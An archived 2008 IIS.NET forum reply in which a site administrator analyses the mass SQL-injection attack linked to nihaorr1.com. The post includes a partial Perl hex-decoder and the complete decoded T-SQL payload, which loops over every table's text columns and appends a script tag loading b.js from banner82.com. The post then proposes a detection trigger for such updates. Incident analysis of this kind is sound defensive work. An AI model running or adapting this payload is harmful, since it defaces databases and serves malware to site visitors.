We are excited to announce that the IIS.NET Forums are moving to the new Microsoft Q&A experience. Learn more >

View Complete Thread
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 06:22 PM|silkyfixer|LINK

    when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder write a decrypt script to decode the hex


    my $s=<<"EOF";
    while (length($s)>0) {
      my $hex=substr($s,0,2); $s=substr($s,2,length($s));
      my $ch=hex($hex); $ch=pack("C",$ch);
      print $ch;


    now decoded you notice that its what was in the wild

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

     the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.

    i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files

     it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)